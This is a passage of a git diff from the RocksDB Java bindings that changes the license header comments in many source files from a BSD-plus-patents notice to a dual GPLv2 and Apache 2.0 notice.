2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the callback "bridge" between Java and C++ for // rocksdb::WriteBatch::Handler. diff --git a/java/samples/src/main/java/RocksDBColumnFamilySample.java b/java/samples/src/main/java/RocksDBColumnFamilySample.java index 73170d91fb3..650b1b2f600 100644 --- a/java/samples/src/main/java/RocksDBColumnFamilySample.java +++ b/java/samples/src/main/java/RocksDBColumnFamilySample.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. 
+// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). import org.rocksdb.*; diff --git a/java/samples/src/main/java/RocksDBSample.java b/java/samples/src/main/java/RocksDBSample.java index 97007aa7fd5..b1f9805553d 100644 --- a/java/samples/src/main/java/RocksDBSample.java +++ b/java/samples/src/main/java/RocksDBSample.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). import java.lang.IllegalArgumentException; import java.util.Arrays; diff --git a/java/src/main/java/org/rocksdb/AbstractCompactionFilter.java b/java/src/main/java/org/rocksdb/AbstractCompactionFilter.java index 7d3c5bcd92f..976401fba08 100644 --- a/java/src/main/java/org/rocksdb/AbstractCompactionFilter.java +++ b/java/src/main/java/org/rocksdb/AbstractCompactionFilter.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; /** diff --git a/java/src/main/java/org/rocksdb/AbstractComparator.java b/java/src/main/java/org/rocksdb/AbstractComparator.java index 78ee3716585..0fc4a19dfbd 100644 --- a/java/src/main/java/org/rocksdb/AbstractComparator.java +++ b/java/src/main/java/org/rocksdb/AbstractComparator.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/AbstractImmutableNativeReference.java b/java/src/main/java/org/rocksdb/AbstractImmutableNativeReference.java index b0af31ac37a..b1dc1ef3795 100644 --- a/java/src/main/java/org/rocksdb/AbstractImmutableNativeReference.java +++ b/java/src/main/java/org/rocksdb/AbstractImmutableNativeReference.java @@ -1,7 +1,7 @@ // Copyright (c) 2016, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 
package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/AbstractNativeReference.java b/java/src/main/java/org/rocksdb/AbstractNativeReference.java index c5aae48909b..ffb0776e4a6 100644 --- a/java/src/main/java/org/rocksdb/AbstractNativeReference.java +++ b/java/src/main/java/org/rocksdb/AbstractNativeReference.java @@ -1,7 +1,7 @@ // Copyright (c) 2016, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/AbstractRocksIterator.java b/java/src/main/java/org/rocksdb/AbstractRocksIterator.java index a1547b3b338..52bd00f47ce 100644 --- a/java/src/main/java/org/rocksdb/AbstractRocksIterator.java +++ b/java/src/main/java/org/rocksdb/AbstractRocksIterator.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/AbstractSlice.java b/java/src/main/java/org/rocksdb/AbstractSlice.java index 75e1f393f7b..5a22e29562e 100644 --- a/java/src/main/java/org/rocksdb/AbstractSlice.java +++ b/java/src/main/java/org/rocksdb/AbstractSlice.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/AbstractWriteBatch.java b/java/src/main/java/org/rocksdb/AbstractWriteBatch.java index 6c08d7e4258..b2e5571809a 100644 --- a/java/src/main/java/org/rocksdb/AbstractWriteBatch.java +++ b/java/src/main/java/org/rocksdb/AbstractWriteBatch.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 
package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/AccessHint.java b/java/src/main/java/org/rocksdb/AccessHint.java index 8202e89a839..877c4ab39ae 100644 --- a/java/src/main/java/org/rocksdb/AccessHint.java +++ b/java/src/main/java/org/rocksdb/AccessHint.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/AdvancedColumnFamilyOptionsInterface.java b/java/src/main/java/org/rocksdb/AdvancedColumnFamilyOptionsInterface.java index 54011b983a0..d3908d1a379 100644 --- a/java/src/main/java/org/rocksdb/AdvancedColumnFamilyOptionsInterface.java +++ b/java/src/main/java/org/rocksdb/AdvancedColumnFamilyOptionsInterface.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/AdvancedMutableColumnFamilyOptionsInterface.java b/java/src/main/java/org/rocksdb/AdvancedMutableColumnFamilyOptionsInterface.java index 90b8ec4882e..092fe378435 100644 --- a/java/src/main/java/org/rocksdb/AdvancedMutableColumnFamilyOptionsInterface.java +++ b/java/src/main/java/org/rocksdb/AdvancedMutableColumnFamilyOptionsInterface.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/BackupEngine.java b/java/src/main/java/org/rocksdb/BackupEngine.java index 22f1d359e54..763994575ce 100644 --- a/java/src/main/java/org/rocksdb/BackupEngine.java +++ b/java/src/main/java/org/rocksdb/BackupEngine.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 
package org.rocksdb; import java.util.List; diff --git a/java/src/main/java/org/rocksdb/BackupInfo.java b/java/src/main/java/org/rocksdb/BackupInfo.java index f2132c56c8e..10f418629a9 100644 --- a/java/src/main/java/org/rocksdb/BackupInfo.java +++ b/java/src/main/java/org/rocksdb/BackupInfo.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; /** diff --git a/java/src/main/java/org/rocksdb/BackupableDBOptions.java b/java/src/main/java/org/rocksdb/BackupableDBOptions.java index 53a2bb314e7..8bb41433f21 100644 --- a/java/src/main/java/org/rocksdb/BackupableDBOptions.java +++ b/java/src/main/java/org/rocksdb/BackupableDBOptions.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/BlockBasedTableConfig.java b/java/src/main/java/org/rocksdb/BlockBasedTableConfig.java index 050eff1c89b..2d847de29d3 100644 --- a/java/src/main/java/org/rocksdb/BlockBasedTableConfig.java +++ b/java/src/main/java/org/rocksdb/BlockBasedTableConfig.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; /** diff --git a/java/src/main/java/org/rocksdb/BloomFilter.java b/java/src/main/java/org/rocksdb/BloomFilter.java index a8c2f7e7f95..316c3ad838b 100644 --- a/java/src/main/java/org/rocksdb/BloomFilter.java +++ b/java/src/main/java/org/rocksdb/BloomFilter.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 
package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/BuiltinComparator.java b/java/src/main/java/org/rocksdb/BuiltinComparator.java index 436cb513f18..2c89bf218d1 100644 --- a/java/src/main/java/org/rocksdb/BuiltinComparator.java +++ b/java/src/main/java/org/rocksdb/BuiltinComparator.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/Cache.java b/java/src/main/java/org/rocksdb/Cache.java index 2b74b15462f..3952e1d109c 100644 --- a/java/src/main/java/org/rocksdb/Cache.java +++ b/java/src/main/java/org/rocksdb/Cache.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java b/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java index 71c77b64330..55d67a3a375 100644 --- a/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java +++ b/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. diff --git a/java/src/main/java/org/rocksdb/Checkpoint.java b/java/src/main/java/org/rocksdb/Checkpoint.java index d8672277843..0009699325c 100644 --- a/java/src/main/java/org/rocksdb/Checkpoint.java +++ b/java/src/main/java/org/rocksdb/Checkpoint.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 
package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/ChecksumType.java b/java/src/main/java/org/rocksdb/ChecksumType.java index 7f560170c01..def9f2e9f49 100644 --- a/java/src/main/java/org/rocksdb/ChecksumType.java +++ b/java/src/main/java/org/rocksdb/ChecksumType.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/ClockCache.java b/java/src/main/java/org/rocksdb/ClockCache.java index 7a2c8e7f873..a66dc0e8a72 100644 --- a/java/src/main/java/org/rocksdb/ClockCache.java +++ b/java/src/main/java/org/rocksdb/ClockCache.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/ColumnFamilyDescriptor.java b/java/src/main/java/org/rocksdb/ColumnFamilyDescriptor.java index 84581f465c7..d932fd9a927 100644 --- a/java/src/main/java/org/rocksdb/ColumnFamilyDescriptor.java +++ b/java/src/main/java/org/rocksdb/ColumnFamilyDescriptor.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/ColumnFamilyHandle.java b/java/src/main/java/org/rocksdb/ColumnFamilyHandle.java index 6aa22d3feaf..7726cc62d79 100644 --- a/java/src/main/java/org/rocksdb/ColumnFamilyHandle.java +++ b/java/src/main/java/org/rocksdb/ColumnFamilyHandle.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 
package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/ColumnFamilyOptions.java b/java/src/main/java/org/rocksdb/ColumnFamilyOptions.java index 5528dca62c1..647b92e16cb 100644 --- a/java/src/main/java/org/rocksdb/ColumnFamilyOptions.java +++ b/java/src/main/java/org/rocksdb/ColumnFamilyOptions.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/ColumnFamilyOptionsInterface.java b/java/src/main/java/org/rocksdb/ColumnFamilyOptionsInterface.java index 78901517983..5cb68b46148 100644 --- a/java/src/main/java/org/rocksdb/ColumnFamilyOptionsInterface.java +++ b/java/src/main/java/org/rocksdb/ColumnFamilyOptionsInterface.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/CompactionOptionsFIFO.java b/java/src/main/java/org/rocksdb/CompactionOptionsFIFO.java index f7925f58fe5..f795807804d 100644 --- a/java/src/main/java/org/rocksdb/CompactionOptionsFIFO.java +++ b/java/src/main/java/org/rocksdb/CompactionOptionsFIFO.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/CompactionOptionsUniversal.java b/java/src/main/java/org/rocksdb/CompactionOptionsUniversal.java index c6a49cf850b..d2dfa4eef1a 100644 --- a/java/src/main/java/org/rocksdb/CompactionOptionsUniversal.java +++ b/java/src/main/java/org/rocksdb/CompactionOptionsUniversal.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 
package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/CompactionPriority.java b/java/src/main/java/org/rocksdb/CompactionPriority.java index 17dcb993570..a4f53cd64c8 100644 --- a/java/src/main/java/org/rocksdb/CompactionPriority.java +++ b/java/src/main/java/org/rocksdb/CompactionPriority.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/CompactionStyle.java b/java/src/main/java/org/rocksdb/CompactionStyle.java index 22dc7dcf5fa..5e13363c44c 100644 --- a/java/src/main/java/org/rocksdb/CompactionStyle.java +++ b/java/src/main/java/org/rocksdb/CompactionStyle.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/Comparator.java b/java/src/main/java/org/rocksdb/Comparator.java index 009f2e51f40..817e00fd274 100644 --- a/java/src/main/java/org/rocksdb/Comparator.java +++ b/java/src/main/java/org/rocksdb/Comparator.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/CompressionOptions.java b/java/src/main/java/org/rocksdb/CompressionOptions.java index 9fe21e3d350..4927770e523 100644 --- a/java/src/main/java/org/rocksdb/CompressionOptions.java +++ b/java/src/main/java/org/rocksdb/CompressionOptions.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 
package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/CompressionType.java b/java/src/main/java/org/rocksdb/CompressionType.java index bcb2e8ba2fc..2781537c88f 100644 --- a/java/src/main/java/org/rocksdb/CompressionType.java +++ b/java/src/main/java/org/rocksdb/CompressionType.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/DBOptions.java b/java/src/main/java/org/rocksdb/DBOptions.java index bc8cfa75332..14f0c6c7c9a 100644 --- a/java/src/main/java/org/rocksdb/DBOptions.java +++ b/java/src/main/java/org/rocksdb/DBOptions.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/DBOptionsInterface.java b/java/src/main/java/org/rocksdb/DBOptionsInterface.java index aeee6414a06..50ca083d37a 100644 --- a/java/src/main/java/org/rocksdb/DBOptionsInterface.java +++ b/java/src/main/java/org/rocksdb/DBOptionsInterface.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/DbPath.java b/java/src/main/java/org/rocksdb/DbPath.java index 2a48b63d272..3f0b67557c5 100644 --- a/java/src/main/java/org/rocksdb/DbPath.java +++ b/java/src/main/java/org/rocksdb/DbPath.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/DirectComparator.java b/java/src/main/java/org/rocksdb/DirectComparator.java index d2880475699..4c37dfd56bb 100644 --- a/java/src/main/java/org/rocksdb/DirectComparator.java +++ b/java/src/main/java/org/rocksdb/DirectComparator.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. 
-// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/DirectSlice.java b/java/src/main/java/org/rocksdb/DirectSlice.java index 6a7654ffe0a..b0d35c3cc5a 100644 --- a/java/src/main/java/org/rocksdb/DirectSlice.java +++ b/java/src/main/java/org/rocksdb/DirectSlice.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/EncodingType.java b/java/src/main/java/org/rocksdb/EncodingType.java index e27a9853ff8..5ceeb54c826 100644 --- a/java/src/main/java/org/rocksdb/EncodingType.java +++ b/java/src/main/java/org/rocksdb/EncodingType.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/Env.java b/java/src/main/java/org/rocksdb/Env.java index 7d30ea5df11..a46f06178dd 100644 --- a/java/src/main/java/org/rocksdb/Env.java +++ b/java/src/main/java/org/rocksdb/Env.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/EnvOptions.java b/java/src/main/java/org/rocksdb/EnvOptions.java index 0ef55327173..2bca0355e43 100644 --- a/java/src/main/java/org/rocksdb/EnvOptions.java +++ b/java/src/main/java/org/rocksdb/EnvOptions.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 
 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/Experimental.java b/java/src/main/java/org/rocksdb/Experimental.java
index dcbbd37ee53..64b404d6f19 100644
--- a/java/src/main/java/org/rocksdb/Experimental.java
+++ b/java/src/main/java/org/rocksdb/Experimental.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/Filter.java b/java/src/main/java/org/rocksdb/Filter.java
index 01853d9694a..011be208561 100644
--- a/java/src/main/java/org/rocksdb/Filter.java
+++ b/java/src/main/java/org/rocksdb/Filter.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/HistogramData.java b/java/src/main/java/org/rocksdb/HistogramData.java
